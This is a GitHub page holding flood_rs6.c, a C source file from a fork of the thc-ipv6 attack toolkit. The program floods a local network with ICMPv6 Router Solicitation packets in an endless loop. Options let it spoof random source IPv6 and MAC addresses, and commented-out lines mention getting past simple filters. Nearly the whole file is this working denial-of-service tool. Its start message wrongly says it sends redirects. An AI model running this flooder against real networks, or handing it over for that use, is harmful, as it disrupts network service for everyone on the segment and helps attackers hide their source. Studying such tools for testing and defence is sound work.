forked from vanhauser-thc/thc-ipv6
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathflood_rs6.c
135 lines (118 loc) · 3.65 KB
/
flood_rs6.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <time.h>
#include <pcap.h>
#include "thc-ipv6.h"
extern int debug;
void help(char *prg) {
printf("%s %s (c) 2016 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
printf("Syntax: %s [-sS] interface [target]\n\n", prg);
printf("Flood the local network with ICMPv6 Router Soliciation packets.\n");
printf("Option -s uses random source IPv6 addresses. Option -S also randomizes the MAC.\n");
// printf("-F/-D/-H add fragment/destination/hopbyhop header to bypass simple filters\n");
// printf("Use -r to use raw mode.\n\n");
exit(-1);
}
int main(int argc, char *argv[]) {
char *interface;
unsigned char mac[6] = "", *mac6 = mac;
unsigned char buf[1460];
unsigned char *dst = thc_resolve6("ff02::1"), *src = NULL, *dstmac = NULL;
int i, k, type = NXT_ICMP6, offset = 14, mychecksum, prefer = PREFER_LINK;
unsigned char *pkt2 = NULL;
int pkt_len2 = 0, rawmode = 0, count = 0, do_hop = 0, do_frag = 0, do_dst = 0;
int until = 0, rand_src = 0, rand_mac = 0;
thc_ipv6_hdr *hdr = NULL;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "sSDFH")) >= 0) {
switch (i) {
case 'F':
do_frag++;
break;
case 'H':
do_hop = 1;
break;
case 'D':
do_dst = 1;
break;
case 's':
rand_src = 1;
break;
case 'S':
rand_mac = 1;
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
if (argc - optind < 1)
help(argv[0]);
srand(time(NULL) + getpid());
setvbuf(stdout, NULL, _IONBF, 0);
interface = argv[optind];
if (argc - optind > 1) {
if ((dst = thc_resolve6(argv[optind + 1])) == NULL) {
fprintf(stderr, "Error: could not resolve %s\n", argv[optind + 1]);
exit(-1);
}
if (dst[0] >= 0x20 && dst[0] <= 0xfd)
prefer = PREFER_GLOBAL;
}
dstmac = thc_get_mac(interface, src, dst);
src = thc_get_own_ipv6(interface, dst, prefer);
mac6 = thc_get_own_mac(interface);
if (mac6 == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
memset(buf, 0, sizeof(buf));
buf[0] = 1;
buf[1] = 1;
memcpy(buf + 2, mac6, 6);
i = 8;
if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len2, src, dst, 0, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt2, &pkt_len2, ICMP6_ROUTERSOL, 0, 0, buf, i, 0) < 0)
return -1;
thc_generate_pkt(interface, mac6, dstmac, pkt2, &pkt_len2);
hdr = (thc_ipv6_hdr *) pkt2;
k = rand();
if (do_hdr_size)
offset = do_hdr_size;
printf("Starting to flood with ICMPv6 redirects on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
while (until != 1) {
if (rand_mac) {
memcpy(hdr->pkt + 8, (char*) &k + _TAKE4, 4);
memcpy(hdr->pkt + 14 + 40 + 8 + 2 + 2, (char*) &k + _TAKE4, 4);
}
if (rand_src) {
memcpy(hdr->pkt + 14 + 8 + 8 + 5, (char*) &k + _TAKE3, 3);
}
if (rand_mac || rand_src) {
hdr->pkt[offset + 42] = 0;
hdr->pkt[offset + 43] = 0;
mychecksum = checksum_pseudo_header(hdr->pkt + offset + 8, hdr->pkt + offset + 24, NXT_ICMP6, hdr->pkt + offset + 40, pkt_len2 - offset - 40);
hdr->pkt[offset + 42] = mychecksum / 256;
hdr->pkt[offset + 43] = mychecksum % 256;
k++;
}
count++;
if (thc_send_pkt(interface, pkt2, &pkt_len2) < 0) {
printf("!");
}
// usleep(1);
if (count % 1000 == 0)
printf(".");
if (until > 1)
until--;
}
return 0;
}